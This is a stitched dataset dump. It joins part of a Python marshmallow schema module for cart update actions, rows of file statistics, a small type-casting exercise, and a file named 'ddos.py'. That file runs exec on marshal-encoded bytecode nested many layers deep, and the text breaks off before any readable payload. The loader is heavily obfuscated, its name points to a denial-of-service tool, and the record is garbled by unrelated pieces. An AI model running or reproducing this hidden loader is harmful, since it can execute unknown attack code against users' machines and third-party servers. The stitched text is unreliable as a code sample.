unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetLineItemCustomTypeAction(**data)
class CartSetLineItemDistributionChannelActionSchema(CartUpdateActionSchema):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
distribution_channel = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".channel.ChannelResourceIdentifierSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="distributionChannel",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetLineItemDistributionChannelAction(**data)
class CartSetLineItemPriceActionSchema(CartUpdateActionSchema):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
external_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalPrice",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetLineItemPriceAction(**data)
class CartSetLineItemShippingDetailsActionSchema(CartUpdateActionSchema):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
shipping_details = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingDetails",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetLineItemShippingDetailsAction(**data)
class CartSetLineItemTaxAmountActionSchema(CartUpdateActionSchema):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
external_tax_amount = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxAmountDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxAmount",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetLineItemTaxAmountAction(**data)
class CartSetLineItemTaxRateActionSchema(CartUpdateActionSchema):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
external_tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxRate",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetLineItemTaxRateAction(**data)
class CartSetLineItemTotalPriceActionSchema(CartUpdateActionSchema):
line_item_id = marshmallow.fields.String(
allow_none=True, missing=None, data_key="lineItemId"
)
external_total_price = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalLineItemTotalPriceSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTotalPrice",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetLineItemTotalPriceAction(**data)
class CartSetLocaleActionSchema(CartUpdateActionSchema):
locale = marshmallow.fields.String(
allow_none=True, metadata={"omit_empty": True}, missing=None
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetLocaleAction(**data)
class CartSetShippingAddressActionSchema(CartUpdateActionSchema):
address = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.AddressSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetShippingAddressAction(**data)
class CartSetShippingMethodActionSchema(CartUpdateActionSchema):
shipping_method = helpers.LazyNestedField(
nested=helpers.absmod(
__name__, ".shipping_method.ShippingMethodResourceIdentifierSchema"
),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingMethod",
)
external_tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxRate",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetShippingMethodAction(**data)
class CartSetShippingMethodTaxAmountActionSchema(CartUpdateActionSchema):
external_tax_amount = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxAmountDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxAmount",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetShippingMethodTaxAmountAction(**data)
class CartSetShippingMethodTaxRateActionSchema(CartUpdateActionSchema):
external_tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ExternalTaxRateDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="externalTaxRate",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetShippingMethodTaxRateAction(**data)
class CartSetShippingRateInputActionSchema(CartUpdateActionSchema):
shipping_rate_input = helpers.Discriminator(
allow_none=True,
discriminator_field=("type", "type"),
discriminator_schemas={
"Classification": helpers.absmod(
__name__, ".ClassificationShippingRateInputDraftSchema"
),
"Score": helpers.absmod(__name__, ".ScoreShippingRateInputDraftSchema"),
},
metadata={"omit_empty": True},
missing=None,
data_key="shippingRateInput",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartSetShippingRateInputAction(**data)
class CartUpdateItemShippingAddressActionSchema(CartUpdateActionSchema):
address = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.AddressSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
del data["action"]
return models.CartUpdateItemShippingAddressAction(**data)
class CustomLineItemImportDraftSchema(helpers.BaseSchema):
name = LocalizedStringField(allow_none=True, missing=None)
quantity = marshmallow.fields.Integer(allow_none=True, missing=None)
money = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".common.MoneySchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
missing=None,
)
slug = marshmallow.fields.String(allow_none=True, missing=None)
state = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".order.ItemStateSchema"),
allow_none=True,
many=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
tax_rate = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".tax_category.TaxRateSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxRate",
)
tax_category = helpers.LazyNestedField(
nested=helpers.absmod(
__name__, ".tax_category.TaxCategoryResourceIdentifierSchema"
),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="taxCategory",
)
custom = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".type.CustomFieldsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
)
shipping_details = helpers.LazyNestedField(
nested=helpers.absmod(__name__, ".ItemShippingDetailsDraftSchema"),
allow_none=True,
unknown=marshmallow.EXCLUDE,
metadata={"omit_empty": True},
missing=None,
data_key="shippingDetails",
)
class Meta:
unknown = marshmallow.EXCLUDE
@marshmallow.post_load
def post_load(self, data, **kwargs):
return models.CustomLineItemImportDraft(**data)
| 32.11326
| 88
| 0.65086
| 7,920
| 93,000
| 7.374369
| 0.06351
| 0.044534
| 0.064327
| 0.053317
| 0.769523
| 0.766287
| 0.754336
| 0.747128
| 0.733636
| 0.726325
| 0
| 0
| 0.24843
| 93,000
| 2,895
| 89
| 32.124352
| 0.835599
| 0.00071
| 0
| 0.725249
| 1
| 0
| 0.147713
| 0.087743
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034592
| false
| 0
| 0.004771
| 0.010338
| 0.257256
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1a5dd77af680707d37650fbaa6250f0830f1941f
| 107
|
py
|
Python
|
Term2/4-type-casting-str.py
|
theseana/apondaone
|
7cbf3572a86c73220329804fee1f3d03842ae902
|
[
"MIT"
] | null | null | null |
Term2/4-type-casting-str.py
|
theseana/apondaone
|
7cbf3572a86c73220329804fee1f3d03842ae902
|
[
"MIT"
] | null | null | null |
Term2/4-type-casting-str.py
|
theseana/apondaone
|
7cbf3572a86c73220329804fee1f3d03842ae902
|
[
"MIT"
] | null | null | null |
# a = 42
# print(type(a))
# a = str(a)
# print(type(a))
a = 42.3
print(type(a))
a = str(a)
print(type(a))
| 10.7
| 16
| 0.53271
| 23
| 107
| 2.478261
| 0.26087
| 0.631579
| 0.701754
| 0.578947
| 0.877193
| 0.877193
| 0.877193
| 0.877193
| 0.877193
| 0
| 0
| 0.05814
| 0.196262
| 107
| 9
| 17
| 11.888889
| 0.604651
| 0.439252
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 11
|
1ad098a3f232958a53327bbe5d1205a10e228108
| 229,198
|
py
|
Python
|
ddos.py
|
3RL4N9/DDoS
|
487a01dfd1b3fe0ed1fde4804f6ca378014884fe
|
[
"Apache-2.0"
] | null | null | null |
ddos.py
|
3RL4N9/DDoS
|
487a01dfd1b3fe0ed1fde4804f6ca378014884fe
|
[
"Apache-2.0"
] | null | null | null |
ddos.py
|
3RL4N9/DDoS
|
487a01dfd1b3fe0ed1fde4804f6ca378014884fe
|
[
"Apache-2.0"
] | null | null | null |
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8e:\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf79\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs`9\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc98\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs28\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9b7\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x047\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsm6\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd65\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs?5\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa84\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x114\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsz3\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe32\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsL2\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xb51\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x1e1\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x870\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf0/\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsY/\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc2.\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs+.\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x94-\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xfd,\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsf,\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xcf+\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs8+\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa1*\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\n*\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNss)\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xdc(\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsE(\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xae\'\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x17\'\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x80&\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe9%\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsR%\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xbb$\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs$$\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x8d#\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xf6"\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs_"\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xc8!\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs1!\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x9a \x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x03 \x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsl\x1f\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xd5\x1e\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs>\x1e\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xa7\x1d\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\x10\x1d\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNsy\x1c\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\x01\x00S(\x03\x00\x00\x00i\xff\xff\xff\xffNs\xe2\x1b\x01\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s!\x00\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00e\x00\x00j\x01\x00d\x02\x00\x83\x01\x00d\x01\x00\x04Ud\